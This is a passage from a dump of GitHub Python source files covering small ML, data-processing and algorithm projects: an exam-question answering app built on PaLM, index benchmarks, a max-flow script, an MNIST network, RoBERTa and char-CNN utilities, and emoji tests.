Delhi\n\n (two new lines space for next question)\n\n 2. Explain the concept of inheritance in OOP?\n Ans: Inheritance is the process by which one class takes the properties of another class. The class that inherits the properties of another class is called the derived class or child class. The class whose properties are inherited is called the base class or parent class.\n \"\"\" \n\n response = palm.chat(messages=palm_prompt+question_text)\n\n # Last contains the model's response:\n answer = response.last\n return answer\n except Exception as e:\n return str(e)\n\n\ndef create_document(questions, answers):\n doc = Document()\n doc.add_heading('Question and Answers Document', 0)\n doc.add_paragraph(answers)\n docx_file = \"QnA_AI.docx\"\n pdf_file = \"QnA_AI.pdf\"\n doc.save(docx_file)\n #display this docx file in streamlit\n with open('QnA_AI.docx', 'rb') as f:\n st.download_button('Download Docx with Answers', f, file_name='QnA_AI.docx')\n\n\ndef main():\n st.title(\"AI Assistant\")\n st.write(\"Take a pic of a Question Paper (previous years obv) and upload here: \")\n # run = st.button('Run', key='button1')\n # capture = st.button('Capture', key='button2')\n # FRAME_WINDOW = st.image([])\n # camera = cv2.VideoCapture(0)\n # while run:\n # _, frame = camera.read()\n # frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n # FRAME_WINDOW.image(frame)\n # if capture:\n # cv2.imwrite('cap.jpg', frame)\n # break\n # camera.release()\n img = st.file_uploader(\"Choose an image\", type=[\"jpg\", \"jpeg\", \"png\"])\n time.sleep(2)\n if img is not None:\n image = Image.open(img)\n st.image(image, caption='Uploaded Image.', use_column_width=True)\n print(type(image))\n image.save('img_data/capture.png')\n \n timestamp = int(time.time())\n file_extension = image.format.lower()\n file_path = f'{folder_path}{timestamp}.{file_extension}'\n image.save(file_path)\n else:\n image = Image.open('img_data/default.png')\n image.save('img_data/capture.png')\n \n\n #wait for 2 seconds\n print(\"waiting..\")\n # time.sleep(2)\n print(\"woke\")\n # Step 1: Perform OCR\n question_text = perform_ocr('img_data/capture.png')\n print(question_text)\n st.subheader(\"Scroll down to Download the AI Generated QnA docx file.\")\n st.write(\"\\nPDF version coming soon In Sha' Allah 😉\\n\")\n #st.write(\"Scroll down to Download the AI Generated QnA docx file. (PDF version coming soon In Sha' Allah 😉)\")\n st.write(\"\\n\\nThe questions detected are: \\n\\n\", question_text)\n\n print(\"--------------------------\")\n # Step 2: Get answers\n print(\"Getting answers...\")\n st.subheader(\"Generating answers...\")\n answers = get_answers(question_text)\n print(answers)\n st.write(\"\\n\\nThe Answers generated are: \\n\", answers)\n print(\"--------------------------\")\n # Step 3: Create a Word document\n create_document(question_text, answers)\n print(\"Document created: QnA_AI.docx\")\n\n print(\"converting to pdf\")\n #docx_to_pdf(docx_file, pdf_file)\n #docx2pdf.convert(docx_file, pdf_file)\n #print full path\n print(\"pdf created: \", pdf_file)\n\nif __name__ == '__main__':\n main()","repo_name":"shaikamirgh/Question-Papers-AI","sub_path":"ST_Camera_QnA_main.py","file_name":"ST_Camera_QnA_main.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35816524563","text":"from time import time\nfrom hash_index import create_hash_table\nfrom btree_index import create_tree\nfrom utils import KeyValue\nimport random\nfrom utils.test_performace import test_by_index, test_by_size, compare_methods\nfrom utils.test_filter_performance import compare_methods as compare_filters\nfrom naive_search import NaiveSearch\nfrom naive_filter import NaiveFilter\nfrom bitmap_index.BitMap import BitMap\n\n\ndef create_test_set(N=10000):\n result = []\n for i in range(0, N):\n kv = KeyValue(i, random.randint(0, N))\n result.append(kv)\n return result\n\n\ndef odd_predicate(obj):\n return hash(obj) >> 10 > 15\n\ntest_set = create_test_set(100000)\n\n\nnaive_search = NaiveSearch()\nhash_map = create_hash_table(10)\nprint('First method is hash map index. And the second one is naive search')\ncompare_methods(hash_map, naive_search, test_set)\nprint()\n\nnaive_search = NaiveSearch()\nbtree = create_tree(10)\nprint('The first method is Btree index. And the second one is naive search')\ncompare_methods(btree, naive_search, test_set)\n\nprint()\nhash_map = create_hash_table(10)\nbtree = create_tree(10)\nprint('The first method is Btree index. And the second one is hash map index')\ncompare_methods(btree, hash_map, test_set)\n\nprint()\n# btree = create_tree(3)\n#\n#\n# res = test_by_size(test_set, 100, btree)\n#\n# for i in range(0, len(res)):\n# print('%d %f' % (i, res[i]))\nnaive_search = NaiveFilter(odd_predicate)\nbit_map = BitMap(odd_predicate)\nprint('The first method is bit map index. And the second one is naive filter')\ncompare_filters(bit_map, naive_search, test_set)\n\n\n# for t in test_set:\n# btree.add(t)\n#\n# for t in test_set:\n# btree.search(t.key)\n\n\n\n# naive_search = NaiveSearch()\n#\n# compare_methods(btree, naive_search, test_set)\n\n","repo_name":"Valt25/dropIDx","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34652801067","text":"# coding=utf-8\n\nfrom flask_restplus import Api\nfrom settings import SWAGGER_UI_ENABLED, FLASK_DEBUG\n\n## Swagger documentation\nswagger_docs = '/'\nif not SWAGGER_UI_ENABLED:\n swagger_docs = False\n\n## API Instance\napi = Api(version='1.0',\n title='Japanese to Romaji API',\n description='Converts Kanji, Katakana and Hiragana texts to romanized text.',\n doc=swagger_docs,\n catch_all_404s=True)\n\n\n","repo_name":"nilportugues/japanese-to-romaji-experiment","sub_path":"api/resources/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34588203312","text":"import unittest\n\nfrom pysolcrypto.accumulator import accumulate, witness, ismember\nfrom pysolcrypto.altbn128 import randsn\n\n\nclass AccumulatorTests(unittest.TestCase):\n def test_witness(self):\n secret = randsn()\n items = list(range(1, 10))\n my_item = items[3]\n AkX = accumulate(items, secret)\n W_x = witness(AkX, my_item, secret)\n self.assertTrue(ismember(AkX, my_item, W_x, secret))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"HarryR/solcrypto","sub_path":"test/test_accumulator.py","file_name":"test_accumulator.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":268,"dataset":"github-code","pt":"21"} +{"seq_id":"16601488642","text":"import pandas as pd\n\n#컬럼명을 미리 잡아둠(추후 컬럼명 에러 방지를 위해)\ncolumn = ['순위', '영화명', '개��일', '매출액', '매출액', '매출액증감', '매출액증감율', '누적매출액', '관객수',\n '관객수증감', '관객수증감율', '누적관객수', '스크린수', '상영횟수', '대표국적', '국적', '배급사']\n\n#df들을 적재할 초기화 해둔 데이터프레임을 생성\ndf_res = pd.DataFrame([\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\n], columns = column)\n\n#두번의 반복문을 통해 연도와 주를 받아 해당하는 csv파일을 읽여 들이고 데이터프레임에 적재해 나가는 코드\nfor year in range(2019, 2022):\n if year == 2019:\n for week in range(1,50,4):\n week_str = str(week)\n\n df = pd.read_csv('C:/202105_lab/09.ELKStack/JJJJ_Project/Movie_CSV/weekly/'+str(year)+'_'+week_str+'.csv')\n df1 = df.rename(columns=df.iloc[0])\n df_res = pd.concat([df_res, df1])\n \n elif year == 2020:\n for week in range(1,54,4):\n week_str = str(week)\n \n df = pd.read_csv('C:/202105_lab/09.ELKStack/JJJJ_Project/Movie_CSV/weekly/'+str(year)+'_'+week_str+'.csv')\n df1 = df.rename(columns=df.iloc[0])\n df_res = pd.concat([df_res, df1])\n \n else: \n for week in range(3,24,4):\n week_str = str(week)\n \n df = pd.read_csv('C:/202105_lab/09.ELKStack/JJJJ_Project/Movie_CSV/weekly/'+str(year)+'_'+week_str+'.csv')\n df1 = df.rename(columns=df.iloc[0])\n df_res = pd.concat([df_res, df1])\n\n#적재된 df_res 데이터 프레임에서 필요 없는 정보(열)들을 제거\ndf_res.drop([df_res.columns[1],df_res.columns[2],\n df_res.columns[6], df_res.columns[7], df_res.columns[10],\n df_res.columns[11], df_res.columns[12], df_res.columns[13],\n df_res.columns[14], df_res.columns[15], df_res.columns[16]], axis=1, inplace = True)\n\n#df_res에서 합계액만 있는 행들을 제외한 행들을 삭제\ndf_tot = df_res[df_res['순위'] == '합계']\n\n#df_tot의 열이름들을 새롭게 변경\ndf_tot.columns = ['순위', '매출액', '매출점유율', '매출액증감', '관객수', '관객수증감']\ndf_tot.drop(['순위', '매출점유율'], axis=1, inplace=True)\n\n#매출액과 관객수의 데이터들에서 특수문자 제거 및 실수형으로 변환\ndf_tot[\"매출액\"] = df_tot[\"매출액\"].str.replace(pat=r'[^\\w]', repl=r'', regex=True)\ndf_tot[\"관객수\"] = df_tot[\"관객수\"].str.replace(pat=r'[^\\w]', repl=r'', regex=True)\ndf_tot = df_tot.astype({'매출액': 'float'})\ndf_tot = df_tot.astype({'관객수': 'float'})\n\ndf_tot.reset_index(inplace=True)\ndf_tot.drop([df_tot.columns[0]], axis=1, inplace= True)\n\n#매출액과 관객수를 백만단위로 변환\ndf_tot['매출액'] = df_tot['매출액'] / 1000000\ndf_tot['관객수'] = df_tot['관객수'] / 1000000\n\n\n#매출액에 넣어줄 시리즈 생성\nser1 = pd.Series(df_tot['매출액'])\n\n#매출액 차이를 통해 매출액 변동사항 계산 및 새로운 시리즈에 저장\nlst = [0]\nfor idx in range(1, len(ser1)):\n lst.append((ser1[idx] - ser1[idx-1])/df_tot['매출액'][idx])\n ser2 = pd.Series(lst)\n\n#매출액 증감 열에 위에서 만든 시리즈 대입\ndf_tot['매출액증감'] = ser2\n\n#매출액과 유사하게 관객수 계산\nser3 = pd.Series(df_tot['관객수'])\nlst = [0]\nfor idx in range(1, len(ser3)):\n lst.append((ser3[idx] - ser3[idx-1])/df_tot['관객수'][idx])\n ser4 = pd.Series(lst)\n \ndf_tot['관객수증감'] = ser4\n\n\n#연도와 주차를 넣어줄 리스트 값을 생성 후 변환하여 df-tot의 연도주차 열에 대입하는 과정\nlst = []\nfor year in range(2019, 2022):\n if year == 2019:\n for week in range(1,53):\n yt_week = str(year)+'_'+str(week)\n lst.append(yt_week)\n elif year == 2020:\n for week in range(1,54):\n yt_week = str(year)+'_'+str(week) \n lst.append(yt_week)\n else:\n for week in range(1,27):\n yt_week = str(year)+'_'+str(week)\n lst.append(yt_week)\nser_yr_wekk = pd.Series(lst)\n\ndf_tot['연도주차'] = ser_yr_wekk\n\n\n#정제한 데이터프레임을 weekly_total.csv로 저장\ndf_tot.to_csv(\"./Movie_CSV/weekly_total.csv\", index=False)","repo_name":"dlwlsdudo1/JJJJ_Project","sub_path":"Python/week_movie_csv_transform.py","file_name":"week_movie_csv_transform.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8677908111","text":"lista1=[5,8,3,7,2,4,6,1]\r\nlista2=[True]\r\n\r\ndef funkcija():\r\n for i in range(1, len(lista1)):\r\n if lista1[i] > lista1[i-1]:\r\n lista2.append(True)\r\n else:\r\n lista2.append(False)\r\n \r\nfunkcija()\r\nprint(lista1)\r\nprint(lista2)","repo_name":"aljinovic-ante/Introduction_to_Programming","sub_path":"Vjezba 11/vje11zad3.py","file_name":"vje11zad3.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"bs","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40373823034","text":"# program is an example of building and training a neural network (Artificial Neural Network or ANN) for digit recognition using the MNIST dataset\n\n\nimport tensorflow # for neural network\nfrom tensorflow import keras # keras for high-level neural network APIs\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Dense,Flatten\n\n# load the MNIST dataset:\n\n# It consists of 28x28 pixel grayscale images of handwritten digits (0-9) for training and testing.\n\n(X_train,Y_train),(X_test,Y_test) =keras.datasets.mnist.load_data()\nprint(X_train) # X_train and X_test are NumPy arrays containing the pixel values of images.\nprint(X_test.shape) # TELLS HOW MANY ROWS\nprint(Y_train) # Each element in Y_train represents the true digit label (0-9) for the corresponding image in X_train.\n\n# Tells which image is in particular column\nimport matplotlib.pyplot as plt\nplt.imshow(X_train[0]) # is used to display an image, and X_train[0] is the first image in the training dataset.\nplt.show() # this will show the image at particular coloumn\n\n# converting all values from 0 to 255 of images to 0 to 1\n\nX_train = X_train/255 # Dividing each pixel value by 255 scales the pixel values from the original range of 0-255 to a new range of 0-1\nX_test = X_test/255 # When pixel values are in the 0-1 range, it can be easier for the neural network to learn and converge because it avoids issues related to large input values.\nprint(X_test[0])\n\n#ANN\n\nmodel=Sequential() # creating an empty neural network model with no layers.\n# Sequential Model: A sequential model is a linear stack of layers that are executed in a sequential order, one after the other. It is a straightforward way to build a neural network where data flows sequentially from one layer to the next.\n# we need 784 networks but we have data in form of 28*28 so we will flatten data first\n\n\n# Flatten Layer: The layer being added is the \"Flatten\" layer. It's used to convert multi-dimensional input data into a one-dimensional vector.\n# model.add(...): This line adds a new layer to the neural network model.\n# one-dimensional array of 28*28 = 784 values.\nmodel.add(Flatten(input_shape=(28,28))) # will convert the data into 1 d form from its 2-d form\n\n# Dense Layer: The Dense layer is a standard fully connected layer in a neural network. Each neuron in a dense layer is connected to every neuron in the previous layer, making it fully connected.\n\nmodel.add(Dense(128,activation='relu')) # first hidden layer of 128\n\nmodel.add(Dense(32,activation='relu')) # second layer hidden\n\n# the output layer with 10 neurons and softmax activation is designed for multi-class classification. The neural network will compute class probabilities for each of the 10 possible digits (0-9), and the class with the highest probability will be considered the predicted digit when making predictions.\n\nmodel.add(Dense(10,activation='softmax')) # output layer of 10 layer (0-9)\n\nprint(model.summary())\n\n\n# code is related to training a neural network for digit recognition using the MNIST dataset.\n\n# a neural network code is responsible for configuring and compiling the neural network model before training\n# The sparse_categorical_crossentropy loss is commonly used for multi-class classification problems where the target labels are integers (e.g., 0, 1, 2) rather than one-hot encoded vectors.\nmodel.compile(loss='sparse_categorical_crossentropy',optimizer='Adam',metrics=['accuracy'])\n\n\n# training\n# After the model is trained, the history object will contain information about how the model's performance changed during training, such as training loss, validation loss, and other metrics.\nhistory = model.fit(X_train,Y_train,epochs=10,validation_split=0.2)\n\ny_prob = model.predict(X_test) # to generate predictions (probabilities or scores) for a set of input data (X_test) and stores those predictions in the variable y_prob\ny_pred = y_prob.argmax(axis=1) # is used to convert the predicted probabilities (y_prob) into predicted class labels by selecting the class with the highest probability for each input example\nfrom sklearn.metrics import accuracy_score\naccuracy_score(Y_test,y_pred) # The result of accuracy_score(Y_test, y_pred) is a single accuracy score, typically ranging from 0 to 1, where 1 represents perfect accuracy (all predictions are correct), and lower values indicate less accurate predictions\nfrom sklearn.metrics import accuracy_score\naccuracy_score(Y_test,y_pred)\nplt.plot(history.history['loss']) # It helps you understand whether the model is converging (reducing loss) or if there are signs of overfitting (increasing loss on the validation set).\n# loss-> It quantifies the difference between the model's predictions and the actual target values\nplt.show()\nplt.plot(history.history['val_loss']) # The validation loss is a crucial metric during the training of machine learning models, especially deep neural networks. It provides insight into how well the model generalizes to data that it has not seen during training.\nplt.show()\nplt.plot(history.history['accuracy']) # This code is used to plot the accuracy (classification accuracy) during the training of a classification machine learning model.\nplt.show()\nplt.plot(history.history['val_accuracy']) # This code is used to plot the validation accuracy during the training of a classification machine learning model\nplt.show()\nplt.imshow(X_test[4]) # displays 5th image of dataset\nplt.show()\nprint(model.predict(X_test[4].reshape(1,28,28)).argmax(axis=1)) # It accesses the fifth element","repo_name":"OnlyPooja/digit-recognition","sub_path":"digit recognition using ann.py","file_name":"digit recognition using ann.py","file_ext":"py","file_size_in_byte":5698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"86506593688","text":"import torch\nfrom transformers import RobertaTokenizer, RobertaModel, RobertaConfig\nfrom transformers.modeling_roberta import RobertaForSequenceClassification, RobertaClassificationHead\n\nfrom experiment.bert_utils import BertWrapperModel\nfrom experiment.qa.model import BaseModel\nfrom torch import nn\n\nclass RobertaSigmoid(BaseModel):\n _MODEL = RobertaModel\n\n def __init__(self, from_pretrained, model_name=None, cache_dir=None, config=None, num_labels=1):\n super(RobertaSigmoid, self).__init__(from_pretrained, model_name=model_name, cache_dir=cache_dir, config=config)\n assert num_labels == 1\n self.num_labels = num_labels\n self.dropout = nn.Dropout(self.config.hidden_dropout_prob)\n self.lin_layer = nn.Linear(self.config.hidden_size, num_labels)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, position_ids=None, head_mask=None, tasks=None):\n # we set the token type ids to zero\n # -> https://github.com/huggingface/transformers/issues/1443#issuecomment-581019419\n encoded_layers, pooled_output = self.bert(\n input_ids, token_type_ids=token_type_ids * 0.0, attention_mask=attention_mask, position_ids=None,\n head_mask=head_mask\n )[:2]\n\n # sent_encoding = pooled_output\n sent_encoding = encoded_layers[:, 0, :]\n # sent_encoding = self.dropout(sent_encoding)\n sent_encoding = self.lin_layer(sent_encoding)\n return self.sigmoid(sent_encoding)\n\n\n\nclass RobertaSigmoidModel(BertWrapperModel):\n _MODEL_CLASS = RobertaSigmoid\n _TOKENIZER_CLASS = RobertaTokenizer\n _CONFIG_CLASS = RobertaConfig\n\n\ncomponent = RobertaSigmoidModel\n","repo_name":"UKPLab/emnlp2020-multicqa","sub_path":"bert-ranker/experiment/qa_pointwise/model/roberta_sigmoid.py","file_name":"roberta_sigmoid.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"23110454821","text":"import numpy as np\n\n\nclass Data(object):\n \"\"\" Class to handle loading and processing of raw datasets \"\"\"\n def __init__(self, x, y, alphabet, input_size, n_classes):\n self.x = x\n self.y = y\n self.alphabet = alphabet\n self.alphabet_size = len(alphabet)\n self.length = input_size\n self.n_classes = n_classes\n self.data = None\n self.dict = {}\n for i, ch in enumerate(alphabet):\n self.dict[ch] = i + 1\n\n def load_data(self):\n self.data = np.array(list(zip(self.y, self.x)))\n\n def get_all_data(self):\n \"\"\"\n\n :return: (ndarray) data transformed from raw to indexed form with associated one-hot label\n \"\"\"\n data_size = len(self.data)\n start_index = 0\n end_index = data_size\n batch_texts = self.data[start_index:end_index]\n batch_indices = []\n one_hot = np.eye(self.n_classes, dtype='int64')\n classes = []\n for c, s in batch_texts:\n batch_indices.append(self.str_to_indices(s))\n c = int(c) - 1\n classes.append(one_hot[c])\n\n return np.asarray(batch_indices, dtype='int64'), np.asarray(classes)\n\n def str_to_indices(self, s):\n \"\"\"\n Convert a string to character indices based on character dictionary.\n :param s: (str) string to be converted\n :return: (ndarray) indices of characters in s\n \"\"\"\n s = s.lower()\n max_length = min(len(s), self.length)\n str2idx = np.zeros(self.length, dtype='int64')\n for i in range(1, max_length + 1):\n c = s[-i]\n if c in self.dict:\n str2idx[i - 1] = self.dict[c]\n\n return str2idx\n","repo_name":"markmo/dltemplate","sub_path":"src/text_classification_benchmarks/char_cnn/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"21"} +{"seq_id":"43701931388","text":"import math\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nimport os\r\n\r\nvert = 0\r\nV = []\r\nedges = []\r\n\r\nfor f in os.listdir('.'):\r\n if f.endswith('.png'):\r\n os.remove(f) \r\n\r\ndef add_edge(i, j, cap):\r\n global V\r\n global edges\r\n \r\n if i != j and V[i][j] == 0 and V[j][i] == 0:\r\n V[i][j] = cap\r\n edges.append([i, j])\r\n\r\ndef rand_v(size, edges_per_vertex):\r\n global V\r\n global vert\r\n global edges\r\n \r\n vert = size\r\n V = [[0 for j in range(vert)] for i in range(vert)]\r\n\r\n for _ in range(vert*edges_per_vertex):\r\n i = random.randint(0,vert-2)\r\n j = random.randint(i+1, vert-1)\r\n add_edge(i, j, random.randint(1,20))\r\n \r\n for i in range(vert):\r\n inputs = 0\r\n outputs = 0\r\n for j in range(vert):\r\n if V[i][j] != 0: outputs += 1\r\n if V[j][i] != 0: inputs += 1\r\n if outputs != 0 and inputs == 0:\r\n add_edge(0, i, random.randint(1,20))\r\n if inputs != 0 and outputs == 0:\r\n add_edge(i, vert-1, random.randint(1,20))\r\n\r\ndef file_v(name):\r\n global V\r\n global vert\r\n global edges\r\n\r\n file = open(name, 'r')\r\n vert = int(file.readline().strip())\r\n V = [[0 for j in range(vert)] for i in range(vert)]\r\n for line in file:\r\n x = line[:len(line)-1].split()\r\n i = int(x[0]) # row\r\n j = int(x[1]) # column\r\n cap = int(x[2]) # weight\r\n V[i][j] = cap\r\n V[j][i] = 0\r\n edges.append([i,j])\r\n\r\n file.close()\r\n\r\nfile_v('edges1.txt')\r\n# file_v('edges2.txt')\r\n# rand_v(6, 2)\r\n\r\nimnum = 0\r\ndef print_graph():\r\n global imnum\r\n global V\r\n global edges\r\n G = nx.DiGraph(directed=True)\r\n\r\n for i in range(vert):\r\n G.add_node(str(i))\r\n for x in edges:\r\n G.add_edges_from([(str(x[0]), str(x[1]), {'capacity': str(V[x[0]][x[1]])+'/'+str(V[x[0]][x[1]]+V[x[1]][x[0]])})])\r\n\r\n pos = nx.spring_layout(G, seed=18, iterations=500)\r\n nx.draw_networkx_nodes(G, pos, node_color='lightblue', node_size=500)\r\n nx.draw_networkx_edges(G, pos, edge_color='grey')\r\n nx.draw_networkx_labels(G, pos, font_size=12, font_family='sans-serif')\r\n nx.draw_networkx_edge_labels(\r\n G, pos, edge_labels={(u, v): d['capacity'] for u, v, d in G.edges(data=True)}\r\n )\r\n plt.axis('off')\r\n plt.savefig(f'{imnum}.png')\r\n imnum += 1\r\n\r\ndef find_flows(V):\r\n global vert\r\n\r\n source_id = 0\r\n sink_id = vert-1\r\n\r\n max_flows = 0\r\n while True:\r\n print_graph()\r\n current_id = source_id\r\n path = [(math.inf, -1, source_id)]\r\n visited = {source_id}\r\n\r\n while current_id != sink_id:\r\n max_cap = 0\r\n next_id = -1\r\n for j in range(vert):\r\n if j in visited:\r\n continue;\r\n if max_cap < V[current_id][j]:\r\n max_cap = V[current_id][j]\r\n next_id = j\r\n\r\n if next_id == -1:\r\n if current_id == source_id:\r\n return max_flows\r\n current_id = path.pop()[1]\r\n else:\r\n path.append((max_cap, current_id, next_id))\r\n visited.add(next_id)\r\n current_id = next_id\r\n \r\n flow = min([x[0] for x in path])\r\n max_flows += flow\r\n print(f'Поток {flow} через путь : {[x[2] for x in path]}')\r\n\r\n for p in path:\r\n i, j = p[1], p[2]\r\n if i == -1:\r\n continue\r\n V[i][j] -= flow\r\n V[j][i] += flow\r\n\r\nprint(f'Максимальный поток равен: {find_flows(V)}')\r\n","repo_name":"q2p/lapki","sub_path":"kuznetsov/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10789471945","text":"fruit = ['apple', 'orange', 'manggo']\nfruit = ['orange', 'apple', 'manggo']\n\nfor x in range(len(fruit)):\n print(x,fruit[x])\n\nfor x in fruit:\n print(x)\n\n\nstudent={\n \"name\":\"ana\",\n \"age\":13,\n }\nstudent={\n \"age\":13,\n \"name\":[\"ana\"],\n}\nstudent['name'].append('anna')\nprint(student)\n\nfor x,y in student.items():\n print(x,y)\n\n\nfruit = [\n ['apple', 'orange', 'manggo'],\n ['papaya', 'cherry', 'banana'],\n ['melon', 'watermelon']\n]\n\n\nfor x in fruit:\n for y in x :\n print(y)\n\nfor x in fruit:\n if 'apple' in x :\n print('yes')\n else:\n print('no') \n\n\nstudents={\n \"student1\":{\n \"name\":\"ana\",\n \"age\":13,\n },\n \"student2\":{\n \"name\":\"ani\",\n \"age\":14,\n },\n \"student3\":{\n \"name\":\"ane\",\n \"age\":15,\n }\n}\n\n\nfor y in students:\n for x in students[y]:\n print(students[y][x])\n\nfor studet in students.items():\n print(student)","repo_name":"hamdiranu/backUp_Alta","sub_path":"Alta Batch 4/Phase 1/Week 1/Day 5/Materi/DS/looping.py","file_name":"looping.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24414991763","text":"import pygame\nimport text_to_speech_goog_ai ## good\nimport os\n\n\ndef text_send_to_server():\n \n \n create_text = input(\"requested text: \")\n return create_text\n\ndef play_mp3_content():\n os.system('sudo amixer cset numid=1 100%')\n pygame.init()\n pygame.mixer.init()\n pygame.mixer.music.load('text.mp3')\n pygame.mixer.music.play()\n #pygame.event.wait()\n print(\"end of scrip\")\n os.system('sudo amixer cset numid=1 85%')\n#text_send_to_server()\n","repo_name":"sollarp/Netflix_Voice_Command","sub_path":"Support/text_to_speech_helper.py","file_name":"text_to_speech_helper.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72352917493","text":"import pandas as pd\nimport pickle\nfrom sklearn.feature_extraction import DictVectorizer\nimport os\n\nclass ProcessingData:\n \"\"\"\n A class for processing and pre-processing data.\n\n Attributes:\n None\n\n Methods:\n dump_pickle(obj, filename):\n Dump an object to a pickle file.\n\n read_dataframe(filename):\n Read and preprocess a DataFrame from a file.\n\n preprocess(df, dv, fit_dv=False):\n Preprocess the DataFrame and return transformed data.\n\n run(dest_path=\"data_model_input\", dataset=\"green\", raw_data_path=\"data\"):\n Process the dataset and save preprocessed data and artifacts.\n \"\"\"\n def __init__(self):\n pass\n \n def dump_pickle(self, obj:object, filename: str):\n \"\"\"\n Dump an object to a pickle file.\n\n Args:\n obj (object): The object to dump.\n filename (str): The name of the output pickle file.\n Returns:\n None\n \"\"\"\n with open(filename, \"wb\") as f_out:\n return pickle.dump(obj, f_out)\n \n def read_dataframe(self, filename: str):\n \"\"\"\n Read and preprocess a DataFrame from a file.\n\n Args:\n filename (str): The name of the input data file.\n\n Returns:\n pd.DataFrame: Preprocessed DataFrame.\n \"\"\"\n df = pd.read_parquet(filename)\n df['duration'] = df.lpep_dropoff_datetime - df.lpep_pickup_datetime\n df.duration = df.duration.apply(lambda td: td.total_seconds() / 60)\n df = df[(df.duration >= 1) & (df.duration <= 60)]\n categorical = ['PULocationID', 'DOLocationID']\n df[categorical] = df[categorical].astype(str)\n return df\n \n def preprocess(self, df: pd.DataFrame, dv: DictVectorizer, fit_dv: bool = False):\n \"\"\"\n Preprocess the DataFrame and return transformed data.\n\n Args:\n df (pd.DataFrame): The input DataFrame.\n dv (DictVectorizer): The DictVectorizer for categorical feature encoding.\n fit_dv (bool, optional): Whether to fit the DictVectorizer. Defaults to False.\n\n Returns:\n tuple: A tuple containing transformed data and the fitted DictVectorizer.\n \"\"\"\n df['PU_DO'] = df['PULocationID'] + '_' + df['DOLocationID']\n categorical = ['PU_DO']\n numerical = ['trip_distance']\n dicts = df[categorical + numerical].to_dict(orient='records')\n if fit_dv:\n X = dv.fit_transform(dicts)\n else:\n X = dv.transform(dicts)\n return X, dv\n \n def run(self, dest_path = \"data_model_input\", dataset = \"green\", raw_data_path = \"data\"): \n #\n\n \"\"\"\n Process the dataset and save preprocessed data and artifacts.\n\n Args:\n dest_path (str, optional): The destination path for saving preprocessed data. Defaults to \"data_model_input\".\n dataset (str, optional): The dataset to process. Defaults to \"green\".\n raw_data_path (str, optional): The path to raw data files. Defaults to \"data\".\n\n Returns:\n None\n \"\"\"\n \n df_train = self.read_dataframe(\n os.path.join(raw_data_path, f\"{dataset}_tripdata_2023-01.parquet\")\n )\n df_valid = self.read_dataframe(\n os.path.join(raw_data_path, f\"{dataset}_tripdata_2023-02.parquet\")\n )\n df_test = self.read_dataframe(\n os.path.join(raw_data_path, f\"{dataset}_tripdata_2023-03.parquet\")\n )\n print(df_test.shape)\n\n target = 'duration'\n y_train = df_train[target].values\n y_valid = df_valid[target].values\n y_test = df_test[target].values\n\n dv = DictVectorizer()\n X_train, dv = self.preprocess(df_train, dv, fit_dv=True)\n X_valid, _ = self.preprocess(df_valid, dv, fit_dv=False)\n X_test, _ = self.preprocess(df_test, dv, fit_dv=False)\n\n os.makedirs(dest_path, exist_ok=True)\n\n self.dump_pickle(dv, os.path.join(dest_path, \"dv.pkl\"))\n self.dump_pickle((X_train, y_train), os.path.join(dest_path, \"train.pkl\"))\n self.dump_pickle((X_valid, y_valid), os.path.join(dest_path, \"valid.pkl\"))\n self.dump_pickle((X_test, y_test), os.path.join(dest_path, \"test.pkl\"))\n\n \nif __name__ == '__main__':\n data_processor = ProcessingData()\n data_processor.run()\n","repo_name":"Mariac-db/MLOpsAvanzado","sub_path":"04-model_tracking_mlflow/duration_predictions.py","file_name":"duration_predictions.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73791533174","text":"# -*- coding: UTF-8 -*-\n\n\n\"\"\"Unittests for emoji.core\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport random\nimport re\nimport emoji\nimport pytest\n\n\ndef ascii(s):\n # return escaped Code points \\U000AB123\n return s.encode(\"unicode-escape\").decode()\n\n\ndef test_emojize_name_only():\n for lang_code, emoji_pack in emoji.EMOJI_UNICODE.items():\n for name in emoji_pack.keys():\n actual = emoji.emojize(name, False, language=lang_code)\n expected = emoji_pack[name]\n assert expected == actual, '%s != %s' % (expected, actual)\n\n\ndef test_emojize_complicated_string():\n # A bunch of emoji's with UTF-8 strings to make sure the regex expression is functioning\n name_code = {\n ':flag_for_Ceuta_&_Melilla:': u'\\U0001F1EA\\U0001F1E6',\n ':flag_for_St._Barthélemy:': u'\\U0001F1E7\\U0001F1F1',\n 